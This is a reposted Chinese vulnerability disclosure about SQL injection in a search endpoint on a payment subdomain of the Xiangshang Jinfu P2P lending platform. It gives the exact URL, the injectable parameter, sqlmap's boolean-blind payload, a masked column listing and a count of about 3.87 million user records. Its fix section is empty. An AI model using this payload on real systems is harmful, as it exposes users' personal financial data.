首页 » 漏洞 » P2P安全之向上金服某站SQL注入(涉及近380W用户信息)

P2P安全之向上金服某站SQL注入(涉及近380W用户信息)

 

切入点:https://pay.xiangshang360.com/xweb/bidding/list?period=180-1000&interest=13.0-1000.0&orderByCondition=&pageNum=1&_=1446837749753

P2P安全之向上金服某站SQL注入(涉及近380W用户信息)

code 区域

mask 区域
***** xian*****

*****: u*****

*****olu*****

*****--------+--*****

***** | T*****

*****--------+--*****

***** | b*****

***** | b*****

***** | b*****

***** | b*****

***** | b*****

***** | d*****

***** | d*****

***** | v*****

***** | b*****

***** | b*****

***** | v*****

***** | i*****

***** | b*****

*****_huifu | b*****

***** | b*****

***** | v*****

***** | d*****

***** | v*****

***** | b*****

***** | v*****

***** | v*****

***** | v*****

***** | d*****

***** | i*****

*****ge | b*****

*****aw_cash | b*****

***** | v*****

***** | b*****

***** | v*****

***** | v*****

***** | v*****

***** | b*****

*****--------+--*****

获取下用户的数据数量

P2P安全之向上金服某站SQL注入(涉及近380W用户信息)

漏洞证明:

用户的数据数量

P2P安全之向上金服某站SQL注入(涉及近380W用户信息)

code 区域
sqlmap resumed the following injection point(s) from stored session:

---

Parameter: orderByCondition (GET)

Type: boolean-based blind

Title: MySQL >= 5.0 boolean-based blind - Parameter replace

Payload: period=180-1000&interest=0.0-9.0&orderByCondition=(SELECT (CASE WHEN (5464=5464) THEN 5464 ELSE 5464*(SELECT 5464 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&pageNum=1&_=1446837749750

---

back-end DBMS: MySQL 5.0

select count(*) from user_info: '3872582'

修复方案:

原文链接:P2P安全之向上金服某站SQL注入(涉及近380W用户信息),转载请注明来源!

0